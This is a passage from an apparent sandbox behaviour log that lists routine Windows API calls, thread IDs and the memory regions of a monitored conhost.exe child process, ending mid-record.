[0316.741] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0316.741] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0318.765] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0318.765] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0318.765] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0324.849] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0324.849] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0324.849] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0326.879] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0326.879] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0326.880] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0328.895] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0328.895] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0328.895] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0330.917] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0330.918] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0330.918] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0332.939] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0332.939] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0332.939] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0334.955] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0334.955] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0334.956] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0336.985] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0336.986] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0336.986] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 Thread: id = 23 os_tid = 0x10a4 Thread: id = 24 os_tid = 0xb20 Thread: id = 25 os_tid = 0x5e8 [0149.924] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0149.924] RoInitialize () returned 0x1 [0149.924] RoUninitialize () returned 0x0 [0149.929] ResetEvent (hEvent=0x77c) returned 1 [0251.080] QueryContextAttributesW (in: phContext=0x1e3393ae928, ulAttribute=0x1a, pBuffer=0xb1572cecb8 | out: pBuffer=0xb1572cecb8) returned 0x0 [0251.089] DeleteSecurityContext (phContext=0x1e3393ae928) returned 0x0 [0251.091] shutdown (s=0x894, how=2) returned 0 [0251.094] WSAEventSelect (s=0x894, hEventObject=0x0, lNetworkEvents=0) returned 0 [0251.094] ResetEvent (hEvent=0x8a4) returned 1 [0251.094] setsockopt (s=0x894, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0251.095] closesocket (s=0x894) returned 0 [0251.096] CloseHandle (hObject=0x8a4) returned 1 [0265.214] QueryContextAttributesW (in: phContext=0x1e3394286c0, ulAttribute=0x1a, pBuffer=0xb1572cecb8 | out: pBuffer=0xb1572cecb8) returned 0x0 [0265.216] DeleteSecurityContext (phContext=0x1e3394286c0) returned 0x0 [0265.216] shutdown (s=0x898, how=2) returned 0 [0265.217] WSAEventSelect (s=0x898, hEventObject=0x0, lNetworkEvents=0) returned 0 [0265.217] ResetEvent (hEvent=0x8b4) returned 1 [0265.217] setsockopt (s=0x898, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0265.218] closesocket (s=0x898) returned 0 [0265.218] CloseHandle (hObject=0x8b4) returned 1 [0295.228] CoUninitialize () Thread: id = 26 os_tid = 0x13e0 Thread: id = 27 os_tid = 0x13dc Thread: id = 28 os_tid = 0x1338 Thread: id = 29 os_tid = 0x1358 Thread: id = 30 os_tid = 0x1154 Thread: id = 31 os_tid = 0x490 Thread: id = 32 os_tid = 0x10c8 Thread: id = 34 os_tid = 0x178 [0173.369] CoGetContextToken (in: pToken=0xb15750fd90 | out: pToken=0xb15750fd90) returned 0x0 [0173.369] CObjectContext::QueryInterface () returned 0x0 [0173.369] CObjectContext::GetCurrentThreadType () returned 0x0 [0173.369] Release () returned 0x0 [0173.369] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0173.369] RoInitialize () returned 0x1 [0173.369] RoUninitialize () returned 0x0 Thread: id = 35 os_tid = 0xb8 Thread: id = 47 os_tid = 0x1324 Thread: id = 66 os_tid = 0x1320 Thread: id = 89 os_tid = 0xf04 Thread: id = 94 os_tid = 0xf48 Thread: id = 95 os_tid = 0xf5c Thread: id = 96 os_tid = 0xbec Thread: id = 97 os_tid = 0xb58 Thread: id = 98 os_tid = 0x10ac Thread: id = 99 os_tid = 0xfd0 Thread: id = 100 os_tid = 0xfe4 Thread: id = 101 os_tid = 0xfe8 Thread: id = 102 os_tid = 0xffc Thread: id = 103 os_tid = 0x1008 Thread: id = 104 os_tid = 0x100c Thread: id = 105 os_tid = 0x1010 Thread: id = 106 os_tid = 0x1024 Thread: id = 107 os_tid = 0x1038 Thread: id = 108 os_tid = 0x103c Thread: id = 109 os_tid = 0x1078 Thread: id = 110 os_tid = 0x13f4 Thread: id = 111 os_tid = 0xd00 Thread: id = 112 os_tid = 0xd50 Thread: id = 113 os_tid = 0xa8c Thread: id = 114 os_tid = 0xc1c Thread: id = 115 os_tid = 0xc20 Thread: id = 116 os_tid = 0xc28 Thread: id = 117 os_tid = 0xc48 Thread: id = 118 os_tid = 0xc58 Thread: id = 119 os_tid = 0xc5c Thread: id = 120 os_tid = 0xc64 Thread: id = 121 os_tid = 0xc68 Thread: id = 122 os_tid = 0xc6c Thread: id = 123 os_tid = 0xc70 Thread: id = 124 os_tid = 0xc74 Thread: id = 125 os_tid = 0xc78 Thread: id = 126 os_tid = 0xc7c Thread: id = 127 os_tid = 0xca0 Thread: id = 128 os_tid = 0xca4 Thread: id = 129 os_tid = 0xcac Thread: id = 130 os_tid = 0xcb0 Thread: id = 131 os_tid = 0x1104 Thread: id = 132 os_tid = 0x1108 Thread: id = 133 os_tid = 0xcc4 Thread: id = 134 os_tid = 0x738 Thread: id = 135 os_tid = 0x754 Thread: id = 136 os_tid = 0x870 Thread: id = 137 os_tid = 0x85c Thread: id = 138 os_tid = 0x844 Thread: id = 139 os_tid = 0x434 Thread: id = 140 os_tid = 0x1184 Thread: id = 141 os_tid = 0xcc8 Thread: id = 142 os_tid = 0xa84 Thread: id = 143 os_tid = 0xd5c Thread: id = 144 os_tid = 0xd34 Thread: id = 145 os_tid = 0x608 Thread: id = 146 os_tid = 0x7bc Thread: id = 147 os_tid = 0x1270 Thread: id = 148 os_tid = 0x1260 Thread: id = 149 os_tid = 0x1268 Thread: id = 150 os_tid = 0x154 Thread: id = 151 os_tid = 0x9d4 Thread: id = 152 os_tid = 0xb6c Thread: id = 153 os_tid = 0x11ec Thread: id = 154 os_tid = 0x12a0 Thread: id = 155 os_tid = 0x874 Thread: id = 156 os_tid = 0x1290 Thread: id = 157 os_tid = 0x12b8 Thread: id = 158 os_tid = 0x11b4 Thread: id = 159 os_tid = 0x1190 Thread: id = 160 os_tid = 0x11e0 Thread: id = 161 os_tid = 0x116c Thread: id = 162 os_tid = 0x118c Thread: id = 163 os_tid = 0x11dc Thread: id = 164 os_tid = 0x1194 Thread: id = 165 os_tid = 0xa0c Thread: id = 166 os_tid = 0x11bc Thread: id = 167 os_tid = 0x1198 Thread: id = 168 os_tid = 0x11c4 Thread: id = 169 os_tid = 0x11c0 Thread: id = 170 os_tid = 0x115c Thread: id = 171 os_tid = 0x11d4 Process: id = "2" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x34065000" os_pid = "0x12c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x12c4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 276 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 277 start_va = 0xc470800000 end_va = 0xc4709fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000c470800000" filename = "" Region: id = 278 start_va = 0xc470a00000 end_va = 0xc470a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000c470a00000" filename = "" Region: id = 279 start_va = 0x1f05aac0000 end_va = 0x1f05aadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05aac0000" filename = "" Region: id = 280 start_va = 0x1f05aae0000 end_va = 0x1f05aaf4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05aae0000" filename = "" Region: id = 281 start_va = 0x7df5ff060000 end_va = 0x7ff5ff05ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff060000" filename = "" Region: id = 282 start_va = 0x7ff75cde0000 end_va = 0x7ff75ce02fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff75cde0000" filename = "" Region: id = 283 start_va = 0x7ff75d070000 end_va = 0x7ff75d080fff monitored = 0 entry_point = 0x7ff75d0716b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 284 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 285 start_va = 0x1f05ab00000 end_va = 0x1f05ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05ab00000" filename = "" Region: id = 286 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 287 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 288 start_va = 0x1f05aac0000 end_va = 0x1f05aacffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05aac0000" filename = "" Region: id = 289 start_va = 0x7ff75cce0000 end_va = 0x7ff75cddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff75cce0000" filename = "" Region: id = 290 start_va = 0x1f05ac20000 end_va = 0x1f05acddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 291 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 292 start_va = 0xc470a40000 end_va = 0xc470a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000c470a40000" filename = "" Region: id = 293 start_va = 0x1f05ace0000 end_va = 0x1f05ad9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05ace0000" filename = "" Region: id = 294 start_va = 0x1f05aad0000 end_va = 0x1f05aad6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05aad0000" filename = "" Region: id = 295 start_va = 0x7ffbe35f0000 end_va = 0x7ffbe3648fff monitored = 0 entry_point = 0x7ffbe35ffbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 296 start_va = 0x1f05ab00000 end_va = 0x1f05ab00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05ab00000" filename = "" Region: id = 297 start_va = 0x1f05ab20000 end_va = 0x1f05ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05ab20000" filename = "" Region: id = 298 start_va = 0x7ffbed140000 end_va = 0x7ffbed3bcfff monitored = 0 entry_point = 0x7ffbed214970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 299 start_va = 0x7ffbed620000 end_va = 0x7ffbed73bfff monitored = 0 entry_point = 0x7ffbed6602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 300 start_va = 0x7ffbea0d0000 end_va = 0x7ffbea139fff monitored = 0 entry_point = 0x7ffbea106d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 301 start_va = 0x7ffbead60000 end_va = 0x7ffbeaeb5fff monitored = 0 entry_point = 0x7ffbead6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 302 start_va = 0x7ffbeb9f0000 end_va = 0x7ffbebb75fff monitored = 0 entry_point = 0x7ffbeba3ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 303 start_va = 0x1f05ab10000 end_va = 0x1f05ab16fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05ab10000" filename = "" Region: id = 304 start_va = 0x7ffbeb410000 end_va = 0x7ffbeb552fff monitored = 0 entry_point = 0x7ffbeb438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 305 start_va = 0x7ffbed0e0000 end_va = 0x7ffbed13afff monitored = 0 entry_point = 0x7ffbed0f38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 306 start_va = 0x7ffbed920000 end_va = 0x7ffbed95afff monitored = 0 entry_point = 0x7ffbed9212f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 307 start_va = 0x7ffbeb1b0000 end_va = 0x7ffbeb270fff monitored = 0 entry_point = 0x7ffbeb1d0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 308 start_va = 0x7ffbe84d0000 end_va = 0x7ffbe8655fff monitored = 0 entry_point = 0x7ffbe851d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 309 start_va = 0x1f05ace0000 end_va = 0x1f05ace0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05ace0000" filename = "" Region: id = 310 start_va = 0x1f05acf0000 end_va = 0x1f05acf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05acf0000" filename = "" Region: id = 311 start_va = 0x1f05ad90000 end_va = 0x1f05ad9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05ad90000" filename = "" Region: id = 312 start_va = 0x1f05ada0000 end_va = 0x1f05af27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05ada0000" filename = "" Region: id = 313 start_va = 0x1f05af30000 end_va = 0x1f05b0b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05af30000" filename = "" Region: id = 314 start_va = 0x1f05b0c0000 end_va = 0x1f05c4bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05b0c0000" filename = "" Region: id = 315 start_va = 0x1f05c4c0000 end_va = 0x1f05c56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05c4c0000" filename = "" Region: id = 316 start_va = 0xc470a80000 end_va = 0xc470abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000c470a80000" filename = "" Region: id = 317 start_va = 0x1f05c570000 end_va = 0x1f05c64cfff monitored = 0 entry_point = 0x1f05c5ce0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 318 start_va = 0x7ffbe9fa0000 end_va = 0x7ffbe9faefff monitored = 0 entry_point = 0x7ffbe9fa3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 319 start_va = 0x7ffbe8900000 end_va = 0x7ffbe8995fff monitored = 0 entry_point = 0x7ffbe8925570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 320 start_va = 0x1f05ad00000 end_va = 0x1f05ad4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05ad00000" filename = "" Region: id = 321 start_va = 0x7ffbebb80000 end_va = 0x7ffbed0defff monitored = 0 entry_point = 0x7ffbebce11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 322 start_va = 0x7ffbeac20000 end_va = 0x7ffbeac62fff monitored = 0 entry_point = 0x7ffbeac34b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 323 start_va = 0x7ffbea5d0000 end_va = 0x7ffbeac13fff monitored = 0 entry_point = 0x7ffbea7964b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 324 start_va = 0x7ffbeaff0000 end_va = 0x7ffbeb096fff monitored = 0 entry_point = 0x7ffbeb0058d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 325 start_va = 0x7ffbed820000 end_va = 0x7ffbed871fff monitored = 0 entry_point = 0x7ffbed82f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 326 start_va = 0x7ffbea010000 end_va = 0x7ffbea0c4fff monitored = 0 entry_point = 0x7ffbea0522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 327 start_va = 0x7ffbe9fb0000 end_va = 0x7ffbe9ffafff monitored = 0 entry_point = 0x7ffbe9fb35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 328 start_va = 0x7ffbe9f80000 end_va = 0x7ffbe9f93fff monitored = 0 entry_point = 0x7ffbe9f852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 329 start_va = 0x1f05ad00000 end_va = 0x1f05ad00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05ad00000" filename = "" Region: id = 330 start_va = 0x1f05ad40000 end_va = 0x1f05ad4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05ad40000" filename = "" Region: id = 331 start_va = 0x1f05c570000 end_va = 0x1f05c8a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 332 start_va = 0x1f05ad10000 end_va = 0x1f05ad10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05ad10000" filename = "" Region: id = 333 start_va = 0x7ffbeaf40000 end_va = 0x7ffbeafe6fff monitored = 0 entry_point = 0x7ffbeaf4b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 334 start_va = 0x1f05ad20000 end_va = 0x1f05ad20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05ad20000" filename = "" Region: id = 335 start_va = 0x1f05ad30000 end_va = 0x1f05ad33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 336 start_va = 0x1f05c4c0000 end_va = 0x1f05c504fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000010.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db") Region: id = 337 start_va = 0x1f05c560000 end_va = 0x1f05c56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05c560000" filename = "" Region: id = 338 start_va = 0x1f05ad50000 end_va = 0x1f05ad53fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 339 start_va = 0x1f05c8b0000 end_va = 0x1f05c93dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 340 start_va = 0x1f05ad60000 end_va = 0x1f05ad70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 341 start_va = 0x7ffbdfae0000 end_va = 0x7ffbdfaecfff monitored = 0 entry_point = 0x7ffbdfae1ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 342 start_va = 0xc470ac0000 end_va = 0xc470afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000c470ac0000" filename = "" Region: id = 343 start_va = 0xc470b00000 end_va = 0xc470b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000c470b00000" filename = "" Region: id = 344 start_va = 0x1f05ad80000 end_va = 0x1f05ad83fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 345 start_va = 0x1f05c510000 end_va = 0x1f05c524fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000030.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000030.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000030.db") Region: id = 346 start_va = 0x1f05c530000 end_va = 0x1f05c530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05c530000" filename = "" Region: id = 347 start_va = 0x1f05c940000 end_va = 0x1f05cb5cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05c940000" filename = "" Region: id = 348 start_va = 0x1f05cb60000 end_va = 0x1f05cd73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05cb60000" filename = "" Region: id = 349 start_va = 0x1f05cd80000 end_va = 0x1f05ce8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05cd80000" filename = "" Region: id = 350 start_va = 0x1f05ce90000 end_va = 0x1f05d0a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05ce90000" filename = "" Region: id = 351 start_va = 0x1f05d0b0000 end_va = 0x1f05d1bdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05d0b0000" filename = "" Region: id = 352 start_va = 0xc470b40000 end_va = 0xc470b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000c470b40000" filename = "" Region: id = 353 start_va = 0x7ffbeb280000 end_va = 0x7ffbeb3d9fff monitored = 0 entry_point = 0x7ffbeb2c38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 354 start_va = 0x1f05ad10000 end_va = 0x1f05ad10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05ad10000" filename = "" Region: id = 355 start_va = 0x1f05d1c0000 end_va = 0x1f05d27bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05d1c0000" filename = "" Region: id = 356 start_va = 0x1f05ad10000 end_va = 0x1f05ad13fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05ad10000" filename = "" Region: id = 357 start_va = 0x7ffbe7810000 end_va = 0x7ffbe7831fff monitored = 0 entry_point = 